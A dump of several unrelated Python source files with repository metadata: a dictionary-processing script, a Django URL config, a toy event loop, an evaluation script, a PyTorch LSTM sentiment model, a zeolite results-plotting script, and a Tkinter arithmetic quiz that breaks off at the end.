        self.dict_dir = dict_dir

    def process_corpus_1(self):
        """Split ``term:w1,w2`` lines into one word per line (dict_edu1.txt)."""
        # 'with' guarantees the output file is flushed and closed even on
        # error (the original leaked the dict_edu1.txt handle).
        with open('dict_edu1.txt', 'w') as out:
            for fname in os.listdir(self.dict_dir):  # every dictionary file
                with open(os.path.join(self.dict_dir, fname), 'r') as f:
                    for line in f:
                        # Keep the part after the colon, then split the
                        # comma-separated aliases.  (Renamed from `list`
                        # to stop shadowing the builtin.)
                        words = line.split(":")[1].split(",")
                        for w in words:
                            out.write(w.strip())
                            out.write('\n')

    def process_corpus_2(self):
        """Concatenate all dictionary files, one stripped word per line."""
        with open('dict_edu.txt', 'w') as out:
            for fname in os.listdir(self.dict_dir):
                with open(os.path.join(self.dict_dir, fname), 'r') as f:
                    for w in f:
                        out.write(w.strip())
                        out.write('\n')
if __name__ == '__main__':
    # Command line: -d <dictionary directory>, -t <1|2> selects which of the
    # two processing modes to run.
    parser = optparse.OptionParser()
    parser.add_option("-d", dest="dict_dir", help="directory of dictionary")
    parser.add_option("-t", dest="type", help="1 or 2")
    (options, args) = parser.parse_args()
    if options.type == '1':
        pc = Process_Corpus(options.dict_dir)
        pc.process_corpus_1()
    if options.type == '2':
        pc = Process_Corpus(options.dict_dir)
pc.process_corpus_2() | [
"celiacaoyanan@outlook.com"
] | celiacaoyanan@outlook.com |
fdb2e6f22a3790678cbbe3a58c685e76c19f6da1 | d3aac9f68cd3359d4f42bde16e7d6855015bfa25 | /coolsite/coolsite/urls.py | c2c3e3b9cfd028253c70b50ed83ebd7bca7a2c0c | [] | no_license | my4ever/coolsite | 539e21e95f2da79d1af4dbbb3e7d2bd3bc6257b9 | 7b48f3d2f725a78cd95ca887e085568f7c547f83 | refs/heads/main | 2023-06-26T23:55:55.670869 | 2021-07-30T17:35:30 | 2021-07-30T17:35:30 | 390,052,796 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include
from . import settings
from woman.views import page_not_found
# Root URLconf: the admin, the captcha endpoints, and the `woman` app
# mounted at the site root.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('captcha/', include('captcha.urls')),
    path('', include('woman.urls')),
]
# In DEBUG mode expose django-debug-toolbar under __debug__/ (prepended so
# it takes precedence over the catch-all '' include).
if settings.DEBUG:
    import debug_toolbar
    urlpatterns = [
        path('__debug__/', include(debug_toolbar.urls)),
    ] + urlpatterns
# Serve uploaded media through Django.  NOTE(review): static() is expected
# to be a no-op outside DEBUG — confirm that matches the deployment setup.
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# Custom 404 handler from the woman app.
handler404 = page_not_found
"goodbuhlnr@yandex.ua"
] | goodbuhlnr@yandex.ua |
656c4bcc2e28b5938448e7b70cf38bafc93e704e | 5a4f1e3013290d331d2a1e69daa69c29882fb97c | /asynclib/base_events.py | 297e94c06411df242ff3ccb72025edad82377e36 | [] | no_license | pfmoore/asynclib | 308e28609f28638f7a05c2c8e3f1fde9aa72e984 | b03979cd532632e5165a8d35f2024ce2ea8dfc5b | refs/heads/master | 2021-01-22T03:08:52.297430 | 2015-05-16T12:02:41 | 2015-05-16T12:02:41 | 35,449,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,591 | py | """Event loop."""
from .tasks import Task
class EventLoop:
    """Minimal cooperative event loop driving generator-based coroutines.

    Ready coroutines are advanced one `next()` step at a time in round-robin
    order; plain callables registered with call_soon() run before each step.
    """

    def __init__(self):
        self.ready = []            # coroutines eligible to run
        self.call_soon_queue = []  # plain callables to run before the next step
        self.running = False

    def call_soon(self, fn):
        """Run callable *fn* before the next coroutine step."""
        self.call_soon_queue.append(fn)

    def _run_one_step(self):
        """Drain the call_soon queue, then advance the first ready coroutine."""
        while self.call_soon_queue:
            fn = self.call_soon_queue.pop(0)
            fn()
        if not self.ready:
            return
        current = self.ready[0]
        try:
            next(current)
        except StopIteration:
            self.unschedule(current)
        else:
            if self.ready and self.ready[0] is current:
                # current is hogging the "next available" slot.
                # Fairness: move it to the back so every ready coroutine
                # gets a turn (round robin).
                del self.ready[0]
                self.ready.append(current)

    def run_forever(self):
        """Run until stop() is called or no coroutine remains ready."""
        self.running = True
        try:
            while self.running and self.ready:
                self._run_one_step()
        finally:
            # BUGFIX: previously self.running stayed True after the ready
            # queue drained, so is_running() lied once run_forever() returned.
            self.running = False

    def run_until_complete(self, future):
        """Placeholder; not implemented yet.

        BUGFIX: the original signature lacked *self*, so calling it as a
        method raised TypeError; it is now a proper (no-op) method.
        """
        pass

    def is_running(self):
        """True while run_forever() is executing."""
        return self.running

    def stop(self):
        """Request run_forever() to exit after the current step."""
        self.running = False

    def schedule(self, coro):
        """Add *coro* to the ready queue."""
        self.ready.append(coro)

    def unschedule(self, coro):
        """Remove *coro* from the ready queue if present."""
        if coro in self.ready:
            self.ready.remove(coro)

    def create_task(self, coro):
        """Wrap *coro* in a Task bound to this loop and return it.

        BUGFIX: the Task was previously created and dropped; returning it
        lets callers keep a reference (mirrors asyncio.create_task).
        """
        return Task(coro, loop=self)

    def get_debug(self):
        # Debug mode is not supported by this minimal loop.
        return False

    def call_exception_handler(self, *args):
        # Crude default handler: just dump whatever we were given.
        print(args)
loop = EventLoop()
| [
"p.f.moore@gmail.com"
] | p.f.moore@gmail.com |
f2d870ea60c114be0dfb7f2f551b3c0f0b4a0a48 | 3bb57eb1f7c1c0aced487e7ce88f3cb84d979054 | /qats/scripts/evaluators/formatted_accuracy.py | 5ab4d2d8e8201b614d6d230be335d6d736d814a5 | [] | no_license | ghpaetzold/phd-backup | e100cd0bbef82644dacc73a8d1c6b757b2203f71 | 6f5eee43e34baa796efb16db0bc8562243a049b6 | refs/heads/master | 2020-12-24T16:41:21.490426 | 2016-04-23T14:50:07 | 2016-04-23T14:50:07 | 37,981,094 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,785 | py | import os
from tabulate import tabulate
from scipy.stats import spearmanr
def getAccuracy(pred, gold):
    """Return the fraction of positions where *pred* equals *gold*.

    Args:
        pred: sequence of predicted labels.
        gold: sequence of reference labels, aligned with *pred*.

    Returns:
        float in [0, 1].  Returns 0.0 for empty input (the original raised
        ZeroDivisionError when *pred* was empty).
    """
    if not pred:
        return 0.0
    return sum(1.0 for p, g in zip(pred, gold) if p == g) / len(pred)
# Build a LaTeX-style results table: for each system, the best accuracy and
# best Spearman correlation across its label files, per test set G/M/S/O.
types = ['G', 'M', 'S', 'O']
systems = sorted(os.listdir('../../labels/G'))

# Pretty display names; only systems listed here appear in the final table.
names = {}
names['nn'] = 'SimpleNets-RNN3'
names['nn_adadelta'] = 'SimpleNets-RNN2'
names['nn_mlp'] = 'SimpleNets-MLP'
names['adaboost'] = 'Ada Boosting'
names['dectrees'] = 'Decision Trees'
names['gradientboost'] = 'Gradient Boosting'
names['randomforest'] = 'Random Forests'
names['sgd'] = 'SGD'
names['svm'] = 'SVM'
names['allgood'] = 'All Good'
names['allok'] = 'All Ok'
names['allbad'] = 'All Bad'

# scores[system] -> list of (best accuracy, best spearman), one per type.
scores = {}
for system in systems:
    scores[system] = []

for type in types:
    # Gold labels for this test set: as strings for accuracy, floats for
    # correlation (both read from column 3 of the tab-separated corpus).
    gold = [item.strip().split('\t')[2] for item in open('../../corpora/'+type+'_test.txt')]
    golds = [float(item.strip().split('\t')[2]) for item in open('../../corpora/'+type+'_test.txt')]
    for system in systems:
        files = os.listdir('../../labels/'+type+'/'+system)
        maxacc = -1
        maxspear = 0
        maxfile = None
        for file in files:
            pred = [item.strip().split('\t')[0] for item in open('../../labels/'+type+'/'+system+'/'+file)]
            preds = [float(item.strip().split('\t')[1]) for item in open('../../labels/'+type+'/'+system+'/'+file)]
            # Perturb the first score slightly — presumably to avoid a
            # constant/tied vector in spearmanr; confirm.
            preds[0] = preds[0]+0.00000001
            acc = getAccuracy(pred, gold)
            if acc>maxacc:
                maxacc = acc
                maxfile = file
            spear, f = spearmanr(preds, golds)
            # NOTE(review): this compares *accuracy* against maxspear;
            # `spear > maxspear` looks like the intended condition — confirm.
            if acc>maxspear:
                maxspear = spear
        scores[system].append((maxacc, maxspear))

# Emit one LaTeX table row per named system: "Name & $acc$ & $rho$ ... \\".
for system in sorted(scores.keys()):
    if system in names:
        newline = names[system]
        for value in scores[system]:
            newline += r' & $' + "%.3f" % value[0] + r'$ & $' + "%.3f" % value[1] + r'$'
        newline += r' \\'
        print(newline)
| [
"ghpaetzold@outlook.com"
] | ghpaetzold@outlook.com |
c1884f52d246e17dca03adb0fd99542855b4c864 | 34813fb1156d39a56a00e6e513c19bf0acb22fd2 | /author/admin_flymake.py | 197a1c35c795a89db8fea72b58f1d73653f800fc | [] | no_license | brahle/bullshitbingo | 8e6bd6620c6d9827e79028eb6baf9283da451145 | 3d1eb8810818d1de5a0f3e202e7b35f0ac687c50 | refs/heads/master | 2016-09-05T23:53:29.923667 | 2012-02-05T23:24:45 | 2012-02-05T23:29:51 | 1,101,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | from author.models import Author
| [
"brahle+github@gmail.com"
] | brahle+github@gmail.com |
c5b6311ff0ad31c6a5b3db674ce7c7ed98b290d1 | eb3ec365dab96330d0614995ef7f8729e82cd7dc | /Homework_7_NLP/Part_3_Code/util_Sentiment.py | baa9ca7a29d5251b462e25c5543f4bf5f62fc35d | [
"MIT"
] | permissive | keynhu/IE-534-Deep-Learning | 0d8949499e1b68dc14e3b9315b16b19c9a49ccf6 | bd4bcfe424385040a64c1b736689d1870a5d8709 | refs/heads/master | 2020-03-30T10:00:56.347453 | 2019-02-21T07:26:38 | 2019-02-21T07:26:38 | 151,102,071 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,963 | py | # Import modules
import numpy as np
import itertools
import os
import shutil
import io
import torch
import torch.nn as nn
import torch.utils.data as Data
import torch.autograd.variable as Variable
import torchvision
import torchvision.transforms as transforms
# Device configuration
# Prefer the first CUDA GPU when available, otherwise fall back to CPU.
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
class StatefulLSTM(nn.Module):
    """LSTM cell that keeps its hidden/cell state across forward calls.

    Each call to ``forward`` processes one time step; the (h, c) state is
    carried over between calls until ``reset_state`` is invoked at the start
    of a new sequence.
    """

    def __init__(self, in_size, out_size):
        super(StatefulLSTM, self).__init__()
        self.lstm = nn.LSTMCell(in_size, out_size)
        self.out_size = out_size
        self.h = None  # hidden state, shape (batch, out_size) once set
        self.c = None  # cell state, shape (batch, out_size) once set

    def reset_state(self):
        """Forget the carried state (call before each new sequence)."""
        self.h = None
        self.c = None

    def forward(self, x):
        batch_size = x.data.size()[0]
        if self.h is None:
            # Lazily initialize the state on the same device/dtype as the
            # input.  Fix: the original allocated on a module-level global
            # ``device``, which broke when the input lived elsewhere.
            state_size = [batch_size, self.out_size]
            self.h = x.new_zeros(state_size)
            self.c = x.new_zeros(state_size)
        self.h, self.c = self.lstm(x, (self.h, self.c))
        return self.h
class LockedDropout(nn.Module):
    """Variational ("locked") dropout: one mask sampled per sequence.

    The Bernoulli keep-mask is drawn on the first forward call and reused for
    every subsequent time step until ``reset_state`` is called, so the same
    units stay dropped across the whole sequence.
    """

    def __init__(self):
        super(LockedDropout, self).__init__()
        self.m = None  # cached 0/1 keep-mask, sampled lazily

    def reset_state(self):
        """Discard the cached mask so a new one is sampled on the next call."""
        self.m = None

    def forward(self, x, dropout=0.5, train=True):
        # Dropout is a no-op at evaluation time.
        if train == False:
            return x
        if self.m is None:
            # Sample the mask once per sequence.  ``x.new_empty`` replaces
            # the deprecated ``x.data.new`` and keeps device/dtype of x.
            self.m = x.new_empty(x.size()).bernoulli_(1 - dropout)
        # Fix: the original wrapped the mask in ``Variable(...)``, but the
        # module imports ``torch.autograd.variable`` (a module, not the
        # class), so calling it raised TypeError.  Tensors need no wrapper.
        # Inverted-dropout scaling keeps the expected activation unchanged.
        mask = self.m / (1 - dropout)
        return mask * x
class RNN_model(nn.Module):
    """Stacked stateful-LSTM classifier for binary sentiment labels.

    Architecture: embedding -> 3 x (StatefulLSTM -> BatchNorm1d ->
    LockedDropout) applied one time step at a time, then max-pooling over
    the time axis and a single-logit linear head trained with
    BCEWithLogitsLoss.
    """

    def __init__(self, vocab_size, no_of_hidden_units):
        super(RNN_model, self).__init__()
        self.embedding = nn.Embedding(vocab_size, no_of_hidden_units)

        self.lstm1 = StatefulLSTM(no_of_hidden_units, no_of_hidden_units)
        self.bn_lstm1 = nn.BatchNorm1d(no_of_hidden_units)
        self.dropout1 = LockedDropout()

        self.lstm2 = StatefulLSTM(no_of_hidden_units, no_of_hidden_units)
        self.bn_lstm2 = nn.BatchNorm1d(no_of_hidden_units)
        self.dropout2 = LockedDropout()

        self.lstm3 = StatefulLSTM(no_of_hidden_units, no_of_hidden_units)
        self.bn_lstm3 = nn.BatchNorm1d(no_of_hidden_units)
        self.dropout3 = LockedDropout()

        self.fc_output = nn.Linear(no_of_hidden_units, 1)
        # Binary classification; a CrossEntropyLoss would be the multi-class
        # counterpart.
        self.loss = nn.BCEWithLogitsLoss()

    def reset_state(self):
        """Clear the carried state of every stateful sub-module."""
        for stateful in (self.lstm1, self.dropout1,
                         self.lstm2, self.dropout2,
                         self.lstm3, self.dropout3):
            stateful.reset_state()

    def forward(self, x, t, train=True):
        embedded = self.embedding(x)      # (batch, time, features)
        num_steps = embedded.shape[1]     # sequence length
        self.reset_state()

        per_step = []
        for step in range(num_steps):
            hidden = embedded[:, step, :]
            hidden = self.dropout1(self.bn_lstm1(self.lstm1(hidden)),
                                   dropout=0.3, train=train)
            hidden = self.dropout2(self.bn_lstm2(self.lstm2(hidden)),
                                   dropout=0.3, train=train)
            hidden = self.dropout3(self.bn_lstm3(self.lstm3(hidden)),
                                   dropout=0.3, train=train)
            per_step.append(hidden)

        # (time, batch, features) -> (batch, features, time) for pooling.
        stacked = torch.stack(per_step).permute(1, 2, 0)
        pooled = nn.MaxPool1d(num_steps)(stacked)
        pooled = pooled.view(pooled.size(0), -1)   # (batch, features)
        logits = self.fc_output(pooled)            # (batch, 1)
        return self.loss(logits[:, 0], t), logits[:, 0]
| [
"noreply@github.com"
] | keynhu.noreply@github.com |
054f887e8c4840d4bc053e6bff6ad27cf618f5ff | 1b18db113edef02932a3aae1c6d692bec8a52a31 | /results-analysis/results-Pd1.py | cd4b536a74e1b24317171874ee62bc184ce8f95b | [] | no_license | aljamaha/Zeolite | 20a656caa686b620e5c1c2f216f00472aca416c0 | 963d5b274409266af2944c279a11268be339a1f1 | refs/heads/master | 2021-08-10T10:48:20.863434 | 2021-07-23T07:18:00 | 2021-07-23T07:18:00 | 221,759,500 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,870 | py | import json, os
import matplotlib.pyplot as plt
from ase import atoms, io
from copy import deepcopy
from functions import *
import numpy as np
from oxygen_stable import *
'''
Results Analysis
'''
'Inputs'
plotting = False #if True, plot results for each reference structure
sorted_plot = True #if True, bar plots of energies is sorted from lowest to highest
plt_ref_label = False #if True, add label of the reference to the overall plot
O_n = False #if True, color code plot based on cation-O distance
dir_Pd = 'BEA/Pd1/' #name of dir where the calculations are saved
dir_H = 'BEA/H/' #name of directory where comensating protons are saved
exchange = 'omega'
calc_type = 'sp' #opt or sp
'Directory names'
data_dir = '/home/aljama/'+dir_Pd+'/data/' #dir where json data are saved
calc_dir = '/home/aljama/'+dir_Pd+'/calculations/' #dir where calculations are done
results_dir = '/home/aljama/'+dir_Pd+'/results-analysis/' #dir where results are to be saved
H_data = '/home/aljama/'+dir_H+'/data/' #dir where data for H adsorptions sites are saved
candidates = [] #run hGGA calc on those
'Load data from json files'
with open(data_dir+"data_output.json", "r") as read_file:
data_output = json.load(read_file)
with open(data_dir+"data.json", "r") as read_file:
data_original = json.load(read_file)
'accumulate reference entries (templates from which calculations were created and run)'
references = {} #references for data
for item in data_original:
'entries in references dictionary'
if data_original[item]['reference'] not in references:
references[data_original[item]['reference']] = []
for ref in references:
'name of folders that share same reference'
for item in data_original:
if data_original[item]['reference'] == ref:
if ref != item:
references[ref].append(item)
'accumulate traj files'
# Per-reference accumulation of energies and geometric descriptors.
Pd_H_d, Pd_H_d_all, minimum = {},[],{}  #saves minimum energy for each reference [minimum['3.traj'] = 22.traj]
Al_distance, n_O,n,oxygen_distances= {},{},{},{}
O_Al,O_Si = {},{}
for ref in references:
    'loop over each reference'
    x_pos, E, first_item, O_d, label, candidates = [],[], True, [],[],[]  #For plotting purposes
    for item in references[ref]:
        'each item under reference'
        index = item[0:-5]  #remves .traj from the name
        data_output_entry = calc_index(index, data_output, exchange, calc_type)  #check corresponding name in data_output
        if data_output_entry != 'none':
            'check calcuation dir is available'
            try:
                if data_output[data_output_entry]['status'] == 'complete':
                    'check calc is completed, then copy traj files to new folder'
                    x_pos.append(int(index))  #x-asis position
                    # First completed item defines the zero-energy reference.
                    if first_item == True:
                        E_ref = data_output[data_output_entry]['energy']
                    E.append( (data_output[data_output_entry]['energy']- E_ref)*27.2114 )  #convert from Hartree to e. values of energies for y-axis
                    first_item = False
                    label.append(index)
                    'Al-Al distance'
                    atoms = io.read(calc_dir+data_output_entry+'/qm-initial.traj')
                    Al_distance[ref], n_Al = Al_Al(atoms)
                    '# of oxygens next to Al'
                    if O_n == True:
                        O_Al[item], O_Si[item], oxygen_distances[item] = cation_n_O('Pd',atoms,cutoff=2.51)
                    #atoms_tmp = io.read(calc_dir+data_output_entry+'/input.xyz')
                    #O_Al[item], O_Si[item], oxygen_distances[item] = cation_n_O('Pd',atoms_tmp,cutoff=2.51)
                    'O-O distance'
                    #O_O_distance = O_O(atoms, n_Al)
                    #O_d.append( round(O_O_distance,3) )
                    'Pd-H distance'
                    Pd_H_distance = Pd_H(atoms, n_Al)
                    Pd_H_d[item] = Pd_H_distance
            except:
                # NOTE(review): bare except silently skips any failing item
                # (missing traj, parse error, ...) — consider narrowing.
                pass
    if sorted_plot == True:
        if len(E) >0:  #avoid references not calculated yet
            'bar plot (sorted)'
            new_x, new_E, x_pts = sort(x_pos, E)
            print(ref, len(new_x), new_x[0:13])
            plt.bar(x_pts, new_E, align='center', alpha=1)
            plt.xticks(x_pts, new_x)
            plt.ylabel('Energy (eV)')
            if plotting == True:
                plt.show()
        'save first structure as the minimum energy'
        # NOTE(review): when len(E)==0, new_x may still hold the previous
        # reference's values (or be undefined on the first pass, giving '').
        try:
            minimum[ref] = new_x[0]
        except:
            minimum[ref] = ''
    else:
        'bar plot (not sorted)'
        plt.bar(x_pos, E, align='center', alpha=1)
        plt.xticks(x_pos, x_pos)
        plt.ylabel('Energy (eV)')
        if plotting == True:
            plt.show()
'''Plot rxn energy [bar plot]'''
# Compute the Pd exchange reaction energy for each reference's minimum-energy
# structure, and assign bar colors/hatching from its Al configuration.
E,E_label,ref_label, first_item = [],[],{}, True
coloring,shade,edge,MR4 = {},{},{},{}
for entry in minimum:
    if minimum[entry] != '':
        ref_H = data_original[entry]['reference']  #reference for 16 H calculations
        zeolite_H = min_H(ref_H, H_data, calc_type)
        if zeolite_H != 0:
            'zeolite_H == 0 means that some calc are incomplete'
            data_output_entry = calc_index(str(minimum[entry]), data_output, exchange, calc_type)  #check corresponding name in data_output
            E_qmmm = data_output[data_output_entry]['energy']
            E_rxn = rxn_energy(E_qmmm, zeolite_H, 1)
            E.append(E_rxn)
            E_label.append(minimum[entry])
            ref_label[minimum[entry]] = entry
            # Color by Al count / Al-Al membered-ring combination.
            if data_original[entry]['Al'] == 1:
                coloring[entry] = 'y'
                edge[entry] = 'y'
            elif data_original[entry]['Al-Al MR'] == [5,5]:
                coloring[entry] = 'r'
                edge[entry] = 'r'
            elif data_original[entry]['Al-Al MR'] == [6,6]:
                coloring[entry] = 'b'
                edge[entry] = 'b'
            elif data_original[entry]['Al-Al MR'] == [4,4]:
                coloring[entry] = 'g'
                edge[entry] = 'g'
            else:
                coloring[entry] = 'c'
                edge[entry] = 'c'
            # Hatch NNN (next-nearest-neighbour) entries.
            if data_original[entry]['N'] == 'NNN':
                shade[entry] = '**'
            else:
                shade[entry] = ''
            #if data_original[entry]['Al MR']['4']>2:
            #	MR4[entry] = True
            #else:
            #	#print('{} H calculations are incomplete'.format(entry))
plt.clf() #clear plot
'Overall Pd Rxn energy plot'
# Sorted bar chart of all reaction energies; optional O-coordination coloring.
new_x, new_E, x_pts = sort(E_label, E)
k = 0
ref_list = []
for index, item in enumerate(new_E):
    k+=1
    ref = ref_label[new_x[index]]
    ref_list.append(ref)
    name = str(new_x[index])+'.traj'
    '''
    if ref in data_T[str(T)]:
        plt.bar(x_pts[index], new_E[index],color=coloring[ref_label[new_x[index]]], edgecolor='k', linewidth=4,align='center', alpha=1)
    else:
        plt.bar(x_pts[index], new_E[index],color=coloring[ref_label[new_x[index]]], linewidth=4,align='center', alpha=1)
    '''
    #print(name, O_Al[name], O_Si[name], oxygen_distances[name])
    try:
        if O_n != True:
            #plt.bar(x_pts[index], new_E[index], color=coloring[ref], edgecolor='k', linewidth=4,align='center', alpha=1)
            plt.bar(x_pts[index], new_E[index], color=coloring[ref], hatch=shade[ref], align='center', alpha=0.9)
        else:
            # Color by number of oxygens coordinated to Al around the cation.
            #if O_Al[name] + O_Si[name] == 4:
            if O_Al[name] == 4:
                plt.bar(x_pts[index], new_E[index], color='g', hatch=shade[ref], align='center', alpha=0.9)
                #plt.bar(x_pts[index], new_E[index], color='k', hatch=shade[ref], edgecolor= edge[ref], align='center', alpha=0.9)
                #print(new_x[index], n[name])
            #elif O_Al[name] + O_Si[name] == 3:
            elif O_Al[name] == 3:
                plt.bar(x_pts[index], new_E[index], color='r', hatch=shade[ref], align='center', alpha=0.9)
                #plt.bar(x_pts[index], new_E[index], color='c', hatch=shade[ref], edgecolor= edge[ref], align='center', alpha=0.9)
                #print(new_x[index], n[name])
            #elif O_Al[name] + O_Si[name] == 2:
            elif O_Al[name] == 2:
                plt.bar(x_pts[index], new_E[index], color='b', hatch=shade[ref], align='center', alpha=0.9)
            else:
                print(O_Al[name] + O_Si[name])
                plt.bar(x_pts[index], new_E[index], color='y', hatch=shade[ref], align='center', alpha=0.9)
                #plt.bar(x_pts[index], new_E[index], color='y', hatch=shade[ref], edgecolor= edge[ref], align='center', alpha=0.9)
        try:
            plt.text(x_pts[index], np.max(new_E)+0.12, str(O_Si[name]), color='k',rotation = 90, fontsize=12)
        except:
            pass
        if plt_ref_label == True:
            plt.text(x_pts[index], min(new_E)-0.1, ref, color='k',rotation = 90, fontsize=12)
            #plt.text(x_pts[index], min(new_E)+0.1, n_O[ref], color='k',rotation = 90, fontsize=12)
    except:
        print('Failed', name)
        pass
plt.ylim([np.min(new_E)-0.1, np.max(new_E)+0.1])
plt.xticks(x_pts, new_x, rotation = 90)
plt.ylabel('Energy (eV)')
plt.show()
plt.clf()
'Pd-H distance plot'
# Scatter of reaction energy vs. Pd-H distance for each plotted structure.
for index, item in enumerate(E_label):
    #print(E_label[index], E[index], index)
    plt.plot(Pd_H_d[str(item)+'.traj'], E[index],'ko')
plt.show()
print('ref list', ref_list)
print('energies', new_E)

'Al-Al Distance'
# Scatter of reaction energy vs. Al-Al distance; NNN entries use triangles.
for index, item in enumerate(new_E):
    ref = ref_label[new_x[index]]
    #try:
    #	if MR4[ref] == True:
    #		plt.plot(Al_distance[ref], new_E[index],'sk',markersize=9)
    #except:
    #	pass
    try:
        #if ref in inaccessible:
        #	plt.plot(Al_distance[ref], new_E[index],'sk',markersize=9)
        if shade[ref] == '**':
            plt.plot(Al_distance[ref], new_E[index],coloring[ref]+'^',markersize=6)
        else:
            plt.plot(Al_distance[ref], new_E[index],coloring[ref]+'o',markersize=6)
    except:
        pass
plt.xlim([3, 8])
plt.xlabel('Al-Al distance (A)')
plt.ylabel('Pd Rxn Energy (eV)')
plt.show()
| [
"aljamaha@stanford.edu"
] | aljamaha@stanford.edu |
304611ed667d0e0ce01d8bb668ed44a8c1383183 | 45b58142f951659ff87b004add7aafc012cf374a | /ormiston_computing .py | 5af5c119259455458474e6047e1c59baab8c5c13 | [] | no_license | ashlynraj26/Ormiston_Computing | a913b8f97d8d4ff5997917f664a63535707cc931 | 6912f2fbf6f93077f05aa66619f5010d5a11c521 | refs/heads/main | 2023-09-04T13:17:55.671175 | 2021-11-14T23:38:01 | 2021-11-14T23:38:01 | 388,323,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,323 | py | from tkinter import *
import random
root = Tk()
root.geometry('700x400')
root.title('Ormiston Computing') #CORRECT ONE
score = 0
count = 0
class interface:
###################################################### First frame where user enters their name #########################################
def __init__(self):
self.f1=Frame(bg="#7CFC00")
self.f1.place(x=0,y=0,width=700,height=400)
self.label1=Label(self.f1, text="ENTER YOUR NAME", font = "Helvetica 60 bold", bg="#7CFC00")
self.label1.place(y=70, x=50)
self.usersname=Entry(self.f1, font = "Helvetica 40 bold")
self.usersname.place(y=170,x=190, height=75, width=300)
self.b1=Button(self.f1, text="NEXT", width= 10, height=2, command=self.checkentry)
self.b1.place(y=300, x=480)
self.Font_Tuple1 = ("helvetica", 20, "bold")
self.b1.configure(font= self.Font_Tuple1)
#validates and checks for user input
def checkentry(self):
self.usersname_text = self.usersname.get()
if self.usersname_text =="":
self.errormsg=Label(self.f1, text="Name required", font = "Helvetica 15 bold", fg="red", bg="#7CFC00")
self.errormsg.place(y=260, x=280)
else:
self.difficultypage()
###################################################### Button command to difficulty selection page:######################################
def difficultypage(self):
self.f2=Frame(bg="#8A2BE2")
self.f2.place(x=0,y=0,width=700,height=400)
#widgets
self.label2=Label(self.f2, text="SELECT LEVEL:", font = "Helvetica 60 bold", bg="#8A2BE2")
self.label2.place(y=50, x=100)
self.b2=Button(self.f2, text="EASY", width=14, height=7, highlightbackground="yellow", command=self.easyqpage)
self.b2.place(y=160, x=30)
self.Font_Tuple2 = ("helvetica", 20, "bold")
self.b2.configure(font= self.Font_Tuple2)
self.b3=Button(self.f2,text="MEDIUM", width=14, height=7, highlightbackground="orange", command=self.mediumqpage)
self.b3.place(x=260, y=160)
self.Font_Tuple3 = ("helvetica", 20, "bold")
self.b3.configure(font= self.Font_Tuple3)
self.b4=Button(self.f2,text="HARD", width=14, height=7, highlightbackground="red", command=self.hardqpage)
self.b4.place(x=490, y=160)
self.Font_Tuple4 = ("helvetica", 20, "bold")
self.b4.configure(font= self.Font_Tuple4)
#Lists for difficulty levels
self.easyq = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
self.medq = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
self.hardq = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
################################################################# Easy questions page: ##########################################################################
def easyqpage(self):
self.f3=Frame(bg="#E0FFFF")
self.f3.place(x=0,y=0,width=700, height=400)
#widgets
self.start = Button(self.f3, text="Start", width=16, height=4, command=self.nextq_easy)
self.start.place(x=200, y=95)
self.Font_Tuple6 = ("helvetica", 14, "bold")
self.start.configure(font= self.Font_Tuple6)
self.solving = Entry(self.f3, width=7, font = "Helvetica 40 bold")
self.solving.place(y=90,x=370, height=75, width=100)
self.submit = Button(self.f3, text="Submit Answer", width=16, height=4, command=lambda: self.submt1(self.solving))
self.submit.place(x=280, y=220)
self.Font_Tuple5 = ("helvetica", 14, "bold")
self.submit.configure(font= self.Font_Tuple5)
self.nextq_easy = Button(self.f3, text="Next", width=12, height=3, command=self.nextq_easy)
self.nextq_easy.place(x=290, y=300)
self.Font_Tuple5 = ("helvetica", 16, "bold")
self.nextq_easy.configure(font= self.Font_Tuple5)
#solving Entry (solving =Entry(f3)) for the easy questions
def submt1(self, solving):
global score, count
if self.solving.get() == str(self.resulteasyq()):
self.correct = Label(text="CORRECT", fg="green", font=("helvetica", 38), bg="#E0FFFF")
self.correct.place(x=470, y=120)
self.submit.config(state=DISABLED)
self.solving.config(state=DISABLED)
self.nextq_easy.config(state=NORMAL)
score = score+1
count = count+1
else:
self.wrong = Label(text="WRONG", fg="red", font=("helvetica", 38), bg="#E0FFFF")
self.wrong.place(x=470, y=120)
self.submit.config(state=DISABLED)
self.solving.config(state=DISABLED)
self.nextq_easy.config(state=NORMAL)
count = count+1
#Scoreboard is displayed after 10 questions
if count == 11:
self.scoreboard()
else:
pass
### NEXT CLASS Displays the math question by selecting two random values from the "num" list CLASS
def nextq_easy(self):
self.start.destroy()
self.nextq_easy.config(state=DISABLED)
self.submit.config(state=NORMAL)
self.solving.config(state=NORMAL)
self.solving.delete(0,'end')
self.cover = Label(text=" ", fg="green", font=("helvetica", 40), bg="#E0FFFF")
self.cover.place(x=470, y=120)
self.nextq_easy.easyq1update = random.choice(self.easyq)
self.nextq_easy.easyq2update = random.choice(self.easyq)
self.question = Label(text=f"{self.nextq_easy.easyq1update}+{self.nextq_easy.easyq2update}=", font = "Helvetica 70 bold",bg="#E0FFFF")
self.question.place(y=80, x=160)
#This displays to the user if they got the answer right or wrong ADD THIS TO A CLASS W A DEF FUNC FOR MED AND HARD
def resulteasyq(self):
self.question.destroy()
self.nextq_easy
return self.nextq_easy.easyq1update + self.nextq_easy.easyq2update
############################################################################## SCOREBOARD ###################################################################################
def write(self):
self.studentscoring = open('results.txt', 'a')
self.studentscoring.write(str(self.usersname_text) + " ")
self.studentscoring.write(str(score) + "/11" + "\n")
self.studentscoring.close()
def scoreboard(self):
self.f4=Frame(bg="#FFFF00")
self.f4.place(x=0,y=0,width=700,height=400)
#score displayed on scoreboard
self.playername=Label(self.f4, text=f"{score}/11", font="Helvetica 100 bold", bg="#FFFF00")
self.playername.place(x=240, y=140)
self.newp = Button(self.f4, text="New Player", width=16, height=3, command=lambda: [interface(), self.write()])
